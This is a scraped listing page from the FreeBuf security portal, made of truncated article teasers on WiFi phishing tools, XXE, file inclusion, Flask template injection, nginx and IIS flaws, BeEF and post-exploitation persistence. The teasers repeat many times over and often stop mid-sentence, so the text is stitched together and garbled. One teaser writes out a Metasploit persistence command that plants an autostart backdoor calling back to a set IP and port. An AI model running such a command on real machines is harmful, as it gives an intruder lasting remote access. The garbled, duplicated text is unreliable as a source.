FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。 WIFIPUMPKIN3 WIFI钓鱼工具 简介. wifipumpkin3是用Python编写wifi钓鱼攻击强大框架. 可以快速方便的搭建一个钓鱼wifi，进行钓鱼或中间人攻击，免去了手动搭建环境的繁琐步骤. 支持的攻击种类有： REGEORG内网渗透工具 WEB安全实战系列：文件包含漏洞 《web安全实战》系列集合了web类常见的各种漏洞，希望对web安全工作者、web安全学习者能有所帮助，减少获取知识的时间成本。 百度安全的OPENRASP项目，究竟是什么？ OpenRASP，看到这个名字时，估计很多人也像我一样升腾起不明觉厉的感觉。 KALI LINUX字典生成工具CEWL使用全指南 Hello，大家好！在这篇文章中，我们将教大家如何使用KaliLinux的字典生成工具-Cewl。这是一份工具使用全指南，希望能给大家带来帮助！ WPSCAN使用完整攻略：如何对WORDPRESS站点进行 …TRANSLATE

THIS PAGE

WPScan是Kali

Linux默认自带的一款漏洞扫描工具，它采用PHP编写，能够扫描WordPress网站中的多种安全漏洞，其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 无字母数字WEBSHELL之提高篇 难点呼之欲出了，我前面文章中给出的所有方法，都用到了php中的变量，需要对变量进行变形、异或、取反等操作，最后动态执行函数。但现在，因为$不能使用了，所以我们无法构造php中的变量。 FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。 WIFIPUMPKIN3 WIFI钓鱼工具 简介. wifipumpkin3是用Python编写wifi钓鱼攻击强大框架. 可以快速方便的搭建一个钓鱼wifi，进行钓鱼或中间人攻击，免去了手动搭建环境的繁琐步骤. 支持的攻击种类有： REGEORG内网渗透工具 WEB安全实战系列：文件包含漏洞 《web安全实战》系列集合了web类常见的各种漏洞，希望对web安全工作者、web安全学习者能有所帮助，减少获取知识的时间成本。 百度安全的OPENRASP项目，究竟是什么？ OpenRASP，看到这个名字时，估计很多人也像我一样升腾起不明觉厉的感觉。 KALI LINUX字典生成工具CEWL使用全指南 Hello，大家好！在这篇文章中，我们将教大家如何使用KaliLinux的字典生成工具-Cewl。这是一份工具使用全指南，希望能给大家带来帮助！ WPSCAN使用完整攻略：如何对WORDPRESS站点进行 …TRANSLATE

THIS PAGE

WPScan是Kali

Linux默认自带的一款漏洞扫描工具，它采用PHP编写，能够扫描WordPress网站中的多种安全漏洞，其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 无字母数字WEBSHELL之提高篇 难点呼之欲出了，我前面文章中给出的所有方法，都用到了php中的变量，需要对变量进行变形、异或、取反等操作，最后动态执行函数。但现在，因为$不能使用了，所以我们无法构造php中的变量。 梅开二度，CHROME再次被曝0DAY漏洞 4月14日，Chrome又被曝了第二个0day漏洞，并且其PoC同样也被安全人员在Twitter上公开。 IOX：一款功能强大的端口转发&内网代理工具 iox是一款功能强大的端口转发&内网代理工具，该工具的功能类似于lcx和ew，但是iox的功能和性能都更加强大。 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 CRYAKL勒索病毒改名换姓，更名CRYLOCK持续活跃 背景概述近日，深信服终端安全团队捕获了Crylock勒索软件变种。早在2014年，名为Cryakl的勒索软件开始运营，期间进行了多次迭代后在2020年更名为Crylock。根据文件二进制信息，该勒索软件可能由Bad Black Rabbit团伙开发。样本分析使用Borland Dephi 7开发，利用动态函数地址和动态解密字符串做为反杀 聊聊AWD攻防赛流程及准备经验 攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。 研究人员发现4G LTE网络协议漏洞 四名美国大学的研究人员发现了 4g lte 协议中的问题，利用这个漏洞可以进行虚假信息的编造，还可以监听用户和地址追踪。 后渗透阶段的权限维持（WINDOWS篇）

前言.

当我们在渗透过程中通过漏洞获取到目标主机权限后，往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失，所以权限维持就显得很重要了。 THINKCMF框架上的任意内容包含漏洞 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。 在LINUX中使用环境变量进行提权 在这篇文章中，我将会为大家介绍一些使用环境变量进行Linux提权的方法，包括在CTF challenges中使用到一些的技术。话不多说，让我们进入正题！ 浅谈读取USB键盘流量的隐藏数据技巧

0×00 预备.

wireshark是一款可以用来抓取流量的工具，可以用它来分析流量，从中发现黑客所做的记录和改动，对我们分析被攻击情况和进行防御有很大的帮助，usbkeyboard可以隐藏一些信息，通常，我们可以使用以上工具和方法从中发现一些隐藏信息。 FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。 WIFIPUMPKIN3 WIFI钓鱼工具 wifipumpkin3 是用Python编写wifi钓鱼攻击强大框架. 可以快速方便的搭建一个钓鱼wifi，进行钓鱼或中间人攻击，免去了手动搭建环境的繁琐步骤. 支持的攻击种类有：. 恶意访问点攻击. 中间人攻击. 死角接入点攻击. 额外的captiveflask模板. DNS劫持. 俘虏门户攻击 (captiveflask) WEB安全实战系列：文件包含漏洞

前言

《Web安全实战》系列集合了WEB类常见的各种漏洞，笔者根据自己在Web安全领域中学习和工作的经验，对漏洞原理和漏洞利用面进行了总结分析，致力于漏洞准确性、丰富性，希望对WEB安全工作者、WEB安全学习者能有所帮助，减少获取知识的时间成本。 REGEORG内网渗透工具 梅开二度，CHROME再次被曝0DAY漏洞 该漏洞可以启动计算器应用程序，一时间好友圈里都被计算器刷屏了。. 但没想到仅隔一天，在4月14日，Chrome又被曝了第二个0day漏洞。. 并且其PoC同样也被安全人员在Twitter上公开。. 据悉，该漏洞影响了Chrome最新正式版（89.0.4389.128）以及基于Chromium内核的Microsoft KALI LINUX字典生成工具CEWL使用全指南

Cewl介绍.

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。. 除此之外，Cewl还提供了命令行工具。. 工具源 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 THINKCMF框架上的任意内容包含漏洞 后渗透阶段的权限维持（WINDOWS篇） 首先查看 persistence模块帮助信息：. 运行 run persistence -U -i 10 -p 4444 -r 192.168.34.132 ：. -U：设置后门在用户登录后自启动。. 该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。. 推荐使用该参数；. -i：设置反向连接间隔时间，单位为秒；. -p：设置 浅谈读取USB键盘流量的隐藏数据技巧 当我们用文本文档打开查看的时候：. 发现里面的数据就是原来Leftover Capture Data列的数据，这列数据就是usb键盘键位的代码，可以对这列数据进行处理，过滤掉无用的流量，保留与键位有关的流量，也就是第三个字节的数据，精简一下。. 将以上python脚本保存为 FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。 WIFIPUMPKIN3 WIFI钓鱼工具 wifipumpkin3 是用Python编写wifi钓鱼攻击强大框架. 可以快速方便的搭建一个钓鱼wifi，进行钓鱼或中间人攻击，免去了手动搭建环境的繁琐步骤. 支持的攻击种类有：. 恶意访问点攻击. 中间人攻击. 死角接入点攻击. 额外的captiveflask模板. DNS劫持. 俘虏门户攻击 (captiveflask) WEB安全实战系列：文件包含漏洞

前言

《Web安全实战》系列集合了WEB类常见的各种漏洞，笔者根据自己在Web安全领域中学习和工作的经验，对漏洞原理和漏洞利用面进行了总结分析，致力于漏洞准确性、丰富性，希望对WEB安全工作者、WEB安全学习者能有所帮助，减少获取知识的时间成本。 REGEORG内网渗透工具 梅开二度，CHROME再次被曝0DAY漏洞 该漏洞可以启动计算器应用程序，一时间好友圈里都被计算器刷屏了。. 但没想到仅隔一天，在4月14日，Chrome又被曝了第二个0day漏洞。. 并且其PoC同样也被安全人员在Twitter上公开。. 据悉，该漏洞影响了Chrome最新正式版（89.0.4389.128）以及基于Chromium内核的Microsoft KALI LINUX字典生成工具CEWL使用全指南

Cewl介绍.

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。. 除此之外，Cewl还提供了命令行工具。. 工具源 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 THINKCMF框架上的任意内容包含漏洞 后渗透阶段的权限维持（WINDOWS篇） 首先查看 persistence模块帮助信息：. 运行 run persistence -U -i 10 -p 4444 -r 192.168.34.132 ：. -U：设置后门在用户登录后自启动。. 该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。. 推荐使用该参数；. -i：设置反向连接间隔时间，单位为秒；. -p：设置 浅谈读取USB键盘流量的隐藏数据技巧 当我们用文本文档打开查看的时候：. 发现里面的数据就是原来Leftover Capture Data列的数据，这列数据就是usb键盘键位的代码，可以对这列数据进行处理，过滤掉无用的流量，保留与键位有关的流量，也就是第三个字节的数据，精简一下。. 将以上python脚本保存为 CVE-2020-0796漏洞复现 本文由东塔网络安全学院-10期班学员-柚子好吃23投稿。一、cve-2020-0796简介

0x01 漏洞简介.

cve-2020-0796是由于smbv3协议在处理恶意的压缩数据包时出错所造成的；在解压数据包的时候使用客户端传过来的长度进行解压时，并没有检查长度是否合法，最终导致整数溢出。 梅开二度，CHROME再次被曝0DAY漏洞 该漏洞可以启动计算器应用程序，一时间好友圈里都被计算器刷屏了。. 但没想到仅隔一天，在4月14日，Chrome又被曝了第二个0day漏洞。. 并且其PoC同样也被安全人员在Twitter上公开。. 据悉，该漏洞影响了Chrome最新正式版（89.0.4389.128）以及基于Chromium内核的Microsoft

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 IOX：一款功能强大的端口转发&内网代理工具 iox是一款功能强大的端口转发&内网代理工具，该工具的功能类似于lcx和ew，但是iox的功能和性能都更加强大。. 实际上，lcx和ew都是非常优秀的工具，但还是有地方可以提升的。. 在一开始使用这些工具的一段时间里，那些复杂的命令行参数是很难记忆的，比如说 聊聊AWD攻防赛流程及准备经验

AWD流程. 1.

出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。.

2.

拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。. 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。. 通过攻击拿到 flag 后需要 从零学习FLASK模板注入 模板. flask是使用Jinja2来作为渲染引擎的。. 看例子. 在网站的根目录下新建 templates 文件夹，这里是用来存放html文件。. 也就是模板文件。. test.py. from flask import Flask,url_for,redirect,render_template,render_template_string @app.route ('/index/') def user_login (): return render_template

('index

攻防演练中红队如何识别蜜罐保护自己 最近在攻防演练中经常会遇到蜜罐，这次就来唠唠蜜罐。 后渗透阶段的权限维持（WINDOWS篇） 首先查看 persistence模块帮助信息：. 运行 run persistence -U -i 10 -p 4444 -r 192.168.34.132 ：. -U：设置后门在用户登录后自启动。. 该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。. 推荐使用该参数；. -i：设置反向连接间隔时间，单位为秒；. -p：设置 IIS深入浅出之短文件漏洞知多少 通过IIS短文件漏洞猜测出来的短文件名称，需要继续猜测出全名才可以在IIS上进行访问，即IIS由于安全原因不支持短文件名访问。. 以下是Soroush Dalili给出的几种猜测文件全名的方法：.

1)

通过对目标网站或同类型网站进行爬虫，爬出建立一个字典库，再与得到的 THINKCMF框架上的任意内容包含漏洞 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架，底层采用ThinkPHP3.2.3构建。. ThinkCMF提出灵活的应用机制，框架自身提供基础的管理功能，而开发者可以根据自身的需求以应用的形式进行扩展。. 每个应用都能独立的完成自己的任务，也可通过系统调用其他应用 FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。 REGEORG内网渗透工具

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 WEB安全实战系列：文件包含漏洞

前言

《Web安全实战》系列集合了WEB类常见的各种漏洞，笔者根据自己在Web安全领域中学习和工作的经验，对漏洞原理和漏洞利用面进行了总结分析，致力于漏洞准确性、丰富性，希望对WEB安全工作者、WEB安全学习者能有所帮助，减少获取知识的时间成本。 聊聊AWD攻防赛流程及准备经验

AWD流程. 1.

出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。.

2.

拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。. 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。. 通过攻击拿到 flag 后需要 浅谈XML实体注入漏洞 0x00 XXE漏洞. XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。. xxe漏洞触发的点 KALI LINUX字典生成工具CEWL使用全指南

Cewl介绍.

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。. 除此之外，Cewl还提供了命令行工具。. 工具源 浅谈读取USB键盘流量的隐藏数据技巧 当我们用文本文档打开查看的时候：. 发现里面的数据就是原来Leftover Capture Data列的数据，这列数据就是usb键盘键位的代码，可以对这列数据进行处理，过滤掉无用的流量，保留与键位有关的流量，也就是第三个字节的数据，精简一下。. 将以上python脚本保存为 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 FREEBUF网络安全行业门户TRANSLATE THIS PAGE有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。 REGEORG内网渗透工具

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 WEB安全实战系列：文件包含漏洞

前言

《Web安全实战》系列集合了WEB类常见的各种漏洞，笔者根据自己在Web安全领域中学习和工作的经验，对漏洞原理和漏洞利用面进行了总结分析，致力于漏洞准确性、丰富性，希望对WEB安全工作者、WEB安全学习者能有所帮助，减少获取知识的时间成本。 聊聊AWD攻防赛流程及准备经验

AWD流程. 1.

出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。.

2.

拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。. 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。. 通过攻击拿到 flag 后需要 浅谈XML实体注入漏洞 0x00 XXE漏洞. XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。. xxe漏洞触发的点 KALI LINUX字典生成工具CEWL使用全指南

Cewl介绍.

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。. 除此之外，Cewl还提供了命令行工具。. 工具源 浅谈读取USB键盘流量的隐藏数据技巧 当我们用文本文档打开查看的时候：. 发现里面的数据就是原来Leftover Capture Data列的数据，这列数据就是usb键盘键位的代码，可以对这列数据进行处理，过滤掉无用的流量，保留与键位有关的流量，也就是第三个字节的数据，精简一下。. 将以上python脚本保存为 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 聊聊AWD攻防赛流程及准备经验

AWD流程. 1.

出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。.

2.

拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。. 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。. 通过攻击拿到 flag 后需要 IIS短文件名泄露漏洞 一、 漏洞描述Internet Information Services（IIS，互联网信息服务）是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS在实现上存在文件枚举漏洞，攻击者可利用此漏洞枚举网络服务器根目录中的文件。危害：攻击者可以利用“~”字符猜解或遍历服务器中的文件名，或对IIS服务 XXE漏洞利用技巧：从XML到远程代码执行

基本利用.

通常攻击者会将payload注入XML文件中，一旦文件被执行，将会读取服务器上的本地文件，并对内网发起访问扫描内部网络端口。. 换而言之，XXE是一种从本地到达各种服务的方法。. 此外，在一定程度上这也可能帮助攻击者绕过防火墙规则过滤或身份验证 研究人员发现4G LTE网络协议漏洞 研究人员发现4G LTE网络协议漏洞. *本文中涉及到的相关漏洞已报送厂商并得到修复，本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。. 近期，四名美国大学的研究人员发现了 4G LTE 协议中的问题，利用这个漏洞可以进行虚假信息的 从零学习FLASK模板注入 模板. flask是使用Jinja2来作为渲染引擎的。. 看例子. 在网站的根目录下新建 templates 文件夹，这里是用来存放html文件。. 也就是模板文件。. test.py. from flask import Flask,url_for,redirect,render_template,render_template_string @app.route ('/index/') def user_login (): return render_template

('index

浏览器攻击框架BEEF PART 1 BeEF（ The Browser Exploitation Framework） 是由Wade Alcorn 在2006年开始创建的，至今还在维护。. 是由ruby语言开发的专门针对浏览器攻击的框架。. 这个框架也属于cs的结构，具体可以看下图：. zombie（僵尸）即受害的浏览器。. zombie是被hook（勾连）的，如果浏览器访问了 简述CSRF、SSRF的区别 SSRF,也就是Server Side RequestForgery---服务器端请求伪造。. 从字面上来看，与CSRF不同的是，它是服务器端发出的请求伪造而非从用户一端提交。. 别误会，作为受信任用户，服务器当然不可能做出损害用户信息的事。. 它是一种由攻击者构造形成，由服务端发起请求 用了WIN10家庭版后，我是怎么恢复远程桌面服务的 …TRANSLATE THIS PAGE 4.下载该师傅的rdpwrap.zip，解压之后替换C:\Program Files\RDP Wrapper\rdpwrap.ini即可。. 直接替换不会成功，会出现该问题：. 右键-打开服务，找到该服务关闭。. 5.做完之后我们再运行RDPConf.exe发现就成功了，此时运行RDPCheck.exe，如下图所示，我们就恢复了远程桌面服务。. 后渗透阶段的权限维持（WINDOWS篇） 首先查看 persistence模块帮助信息：. 运行 run persistence -U -i 10 -p 4444 -r 192.168.34.132 ：. -U：设置后门在用户登录后自启动。. 该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。. 推荐使用该参数；. -i：设置反向连接间隔时间，单位为秒；. -p：设置 FREEBUF网络安全行业门户有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。 REGEORG内网渗透工具

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 WEB安全实战系列：文件包含漏洞

前言

《Web安全实战》系列集合了WEB类常见的各种漏洞，笔者根据自己在Web安全领域中学习和工作的经验，对漏洞原理和漏洞利用面进行了总结分析，致力于漏洞准确性、丰富性，希望对WEB安全工作者、WEB安全学习者能有所帮助，减少获取知识的时间成本。 聊聊AWD攻防赛流程及准备经验

AWD流程. 1.

出题方会给每一支队伍部署同样环境的主机，主机有一台或者多台。.

2.

拿到机器后每个队伍会有一定的加固时间或没有加固时间，这个视规则而定。. 3. 每个服务、数据库、主机上都会可能存在 flag 字段，并且会定时刷新。. 通过攻击拿到 flag 后需要 浅谈XML实体注入漏洞 0x00 XXE漏洞. XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。. xxe漏洞触发的点 KALI LINUX字典生成工具CEWL使用全指南

Cewl介绍.

Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。. 除此之外，Cewl还提供了命令行工具。. 工具源 浅谈读取USB键盘流量的隐藏数据技巧 当我们用文本文档打开查看的时候：. 发现里面的数据就是原来Leftover Capture Data列的数据，这列数据就是usb键盘键位的代码，可以对这列数据进行处理，过滤掉无用的流量，保留与键位有关的流量，也就是第三个字节的数据，精简一下。. 将以上python脚本保存为 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。 FREEBUF网络安全行业门户有奖投稿硬蹭热点？黑产控制药物研究机构邮箱搞钓鱼企业空间活动 FreeBuf,国内领先的网络安全行业门户,同时也是爱好者们交流与分享安全技术的社区。

工控安全

工业生产控制系统，广泛用于电力、水利、能源、数据采集等关键基础设施领域。工控安全板块探讨包括scada、dcs、plc等工业控制系统的安全问题。

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 REGEORG内网渗透工具 WEB安全实战系列：文件包含漏洞 《web安全实战》系列集合了web类常见的各种漏洞，希望对web安全工作者、web安全学习者能有所帮助，减少获取知识的时间成本。 浅谈XML实体注入漏洞 学习了xxe漏洞,自己来总结一下,如果有什么写的不到位，不够好的地方，还请师傅们指出。 聊聊AWD攻防赛流程及准备经验 攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。 KALI LINUX字典生成工具CEWL使用全指南 Hello，大家好！在这篇文章中，我们将教大家如何使用KaliLinux的字典生成工具-Cewl。这是一份工具使用全指南，希望能给大家带来帮助！ 浅谈读取USB键盘流量的隐藏数据技巧

0×00 预备.

wireshark是一款可以用来抓取流量的工具，可以用它来分析流量，从中发现黑客所做的记录和改动，对我们分析被攻击情况和进行防御有很大的帮助，usbkeyboard可以隐藏一些信息，通常，我们可以使用以上工具和方法从中发现一些隐藏信息。 UBUNTU下RSACTFTOOL的安装及使用 在CTF比赛中，往往会涉及到RSA解密类的题目，有了这个工具(基于python2.x)做起来就得心应手了。

NGINX漏洞大全

nginx漏洞大全 nginx解析漏洞 CVE-2013-4547-nginx文件名逻辑漏洞. 影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7. 漏洞说明：这个漏洞其实和代码执行没有太大关系，其主要原因是错误地解析了请求的URI， 错误地获取到用户请求的文件名，导致出现权限绕过、代码执行的连带影响。 IIS短文件名泄露漏洞 一、 漏洞描述Internet Information Services（IIS，互联网信息服务）是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS在实现上存在文件枚举漏洞，攻击者可利用此漏洞枚举网络服务器根目录中的文件。危害：攻击者可以利用“~”字符猜解或遍历服务器中的文件名，或对IIS服务 聊聊AWD攻防赛流程及准备经验 攻击别人的靶机可以获取 Flag 分数时，别人会被扣分，同时你也要保护自己的主机不被别人得分，以防扣分。 研究人员发现4G LTE网络协议漏洞 四名美国大学的研究人员发现了 4g lte 协议中的问题，利用这个漏洞可以进行虚假信息的编造，还可以监听用户和地址追踪。 XXE漏洞利用技巧：从XML到远程代码执行 XXE是一种非常常见的漏洞类型，我们几乎每天都会碰到它。在去年的几次web应用渗透中，我们就成功的利用了好几回。 从零学习FLASK模板注入

前记.

之前对于模板漏洞一直没有复现学习，都是直接拿网上的payload来用，这次好好总结一下。

flask基础.

在学习SSTI之前，先把flask的运作流程搞明白。 简述CSRF、SSRF的区别 简述csrf、ssrf的区别 . 在下进入网络安全行业不久，目前对web漏洞可谓是一知半解似懂非懂。正巧公司下午进行考核，对在下来说颇有种赶鸭子上架的体验。 浏览器攻击框架BEEF PART 1

*

本文作者：NT00，本文属FreeBuf原创奖励计划，未经许可禁止转载.

前言.

笔者发现国内很少有系统介绍BeEF框架的文章，所以笔者决定写一个系列。 后渗透阶段的权限维持（WINDOWS篇）

前言.

当我们在渗透过程中通过漏洞获取到目标主机权限后，往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失，所以权限维持就显得很重要了。 用了WIN10家庭版后，我是怎么恢复远程桌面服务的 由于学习的需要，要使用到远程桌面服务。但是我电脑用的是Win10家庭版，微软取消了该服务，所以就想着恢复远程桌面服务。

* 首页

* FB招聘站

* 分类阅读

* 文库

* 专栏

* 公开课

* 企业服务

* 用户服务

* 手机版

微信扫一扫

* 搜索

* 投稿

* 登录

* 注册



* 首页

* FB招聘站

* 专栏

* 分类阅读

* 黑客

漏洞 安全工具

WEB安全

系统安全

网络安全

无线安全

设备/客户端安全

数据库安全

安全管理

企业安全

工控安全

* 极客

极客有意思 周边

* 特色

头条 人物志

活动

视频

观点 招聘

报告

资讯 区块链安全

标准与合规

容器安全

公开课

* 公开课

* 企业服务

* 产品名录

* 企业空间

* 会员体系（我是甲方） * 会员体系（我是厂商）

* 用户服务

* 商城

* 有奖投稿

*

*

提交漏洞

* 参与众测

* 文库

* 文库

* 专题

* 报告

* 投稿

* 注册

* 登录

* 黑客

漏洞 安全工具

WEB安全

系统安全

网络安全

无线安全

设备/客户端安全

数据库安全

安全管理

企业安全

工控安全

* 极客

极客有意思 周边

* 特色

头条 人物志

活动

视频

观点 招聘

报告

资讯 区块链安全

标准与合规

容器安全

公开课

* 产品名录 实时更新的企业安全产品指南 * 企业空间 为企业定制信息安全专属门户 * 会员体系 我是甲方 /

我是厂商

* 商城 用FB金币购物 * 有奖投稿 与整个行业分享你的经验与见解 * 申请专栏 自由创作，打造自主内容品牌 * 提交漏洞 与数万白帽一起，让互联网更安全 * 参与众测 挖洞开启自由职业之路 * 文库 FB百科大全 * 专题 浓缩的安全精华汇总 * 报告 FB研究院专业出品 * 精品公开课 FreeBuf匠心打造精品高端课程 * 普通公开课 分享安全领域的知识与智慧 《网络安全审查办法》与信安从业者有什么关系 Facebook认罚50亿美元创纪录，剑桥分析事件尘埃落定 娄鹤：网络安全人员真的“安全”吗？ 话题讨论 | 国内白帽子“生存”现状 红蓝对抗场景下的二三事 卢明樊：爱奇艺的业务安全风控“秘籍”

Previous Next

解读

《网络安全审查办法》要点解读

